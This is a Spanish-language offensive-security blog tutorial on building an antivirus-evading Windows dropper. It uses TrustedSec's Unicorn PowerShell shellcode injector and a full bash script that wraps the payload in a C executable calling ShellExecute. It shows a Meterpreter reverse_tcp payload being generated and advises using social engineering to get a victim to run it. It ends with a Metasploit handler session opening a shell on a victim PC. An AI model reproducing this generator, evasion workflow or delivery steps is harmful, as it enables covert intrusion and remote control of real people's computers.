Microsoft Windows 7 SP1 y Windows Server 2008 R2 fueron las primeras versiones en incluir PowerShell (versión 2.0) instalado por defecto y desde entonces se ha ido siempre incluyendo en las versiones posteriores. Hoy, Windows Server 2012 R2 y Windows 8.1 incluyen la versión 4.0 de PowerShell. Por lo tanto usar PowerShell para atacar a una máquina Windows es buena idea.
En esta entrada vamos a ver Unicorn, un script en Python escrito precisamente por David Kennedy (Trustedsec) y que se basa en una técnica que presentó junto con Josh Kelley en la Defcon 18: un downgrade en Powershell para inyectar un shellcode en memoria.
En la última release 2.0 de la herramienta se incluyen distintos tipos de ataque (macro, html/hta, crt, ps1) y para llevarlos a cabo sólo tenemos que descargarnos el script y tener instalado por defecto Metasploit.
$ wget https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py
En nuestro ejemplo usaremos además un sencillo script de astr0baby que genera adicionalmente el código C para compilarlo y obtener un ejecutable Win32 que será indetectable por la mayoría de los antivirus actuales (TKaspersky, MS Essentials, ESET, McAfee ..):
#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac'
exit 0
fi
case $4 in
nonuac)
echo 'Generating nonUAC unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;
uac)
echo 'Generating UAC unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.'
;;
"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac'
exit 0
;;
esacAhora le damos permisos de ejecución y generamos un payload para un shell inverso:
# chmod +x unicorn2c.sh
# ./unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.201 8090 nonuac
--------------------------------------
Unicorn Powershell2C code generator
Works for Vista, Win7, Win8 32/64 bit
--------------------------------------
Generating nonUAC unicorn.c ...
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
,/
//
,//
___ /| |//
`__/_ --(/|___/-/
|_-___ __-_`- /-/ .
|_-___,-_____--/_)' )
-_ / __ ( `( __`|
`__| |) ) /(/|
,._____., ',--//-| | ' /
/ __. , / /,---| /
/ / _. `/`_/ _,' | |
| | ( ( | ,/'__/'/ | |
| `--, `_/_------______/ ( )/
| | _. , ___/
| | _
_ /
._ __ _| |
___ |
__ __ _ | |
| _____ ____ | |
| __ ---' .__ | | |
__ --- / ) | /
____/ / ()( `---_ /|
__________/(,--__ _________. | ./ |
| `---_--, _,./ |
| _ ` /`---_______- /
.___,`| /
| _ | ( |: |
| / / | ;
( `_' |
. . `__/ | |
. | |
( )
| | | |
| I `
( __; ( _; ('-_';
|___ ___: ___:
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all
of the code needed in order to inject the powershell attack into memory. Note you will need a place that
supports remote command injection of some sort. Often times this could be through an excel/word doc or
through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to
where you can use this attack at. Simply paste the powershell_attacks.txt command in any command prompt
window or where you have the ability to call the powershell executable and it will give a shell back to
you.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
./unicorn2c.sh: line 35: todos: command not found
[*] Exported unicorn.c To compile use cl.exe unicorn.cComo resultado obtendremos 3 ficheros: 'powershell_attack.txt' que es el payload de Powershell, 'unicorn.rc' con las opciones del handler de Metasploit y 'unicorn.c' que viene a ser un programa que tan sólo lanza el payload con shellexecute.
El siguiente paso será compilar el código de 'unicorn.c' desde Windows (lc.exe), Linux (mono) o de forma online:
Finalmente subimos el ejecutable creado a un motor multi-AV (Virustotal por ej.) y comprobamos que no lo detecta ningún antivirus:
Sólo nos queda preparar el listener en nuestro equipo y usar un poco de ingeniería social para que nuestra víctima lo ejecute y poder obtener así un shell de forma silenciosa:
root@kali:/home/vmotos# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.201
LHOST => 192.168.1.201
msf exploit(handler) > set LPORT 8090
LPORT => 8091
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.201:8090
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.201:8090 -> 192.168.1.8:61887) at 2015-07-20 02:45:49 +0200
meterpreter > systeminfo
[-] Unknown command: systeminfo.
meterpreter > sysinfo
Computer : PCVICTIMA
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : es_ES
Domain : DOMINIO
Logged On Users : 3
Meterpreter : x86/win32
meterpreter >
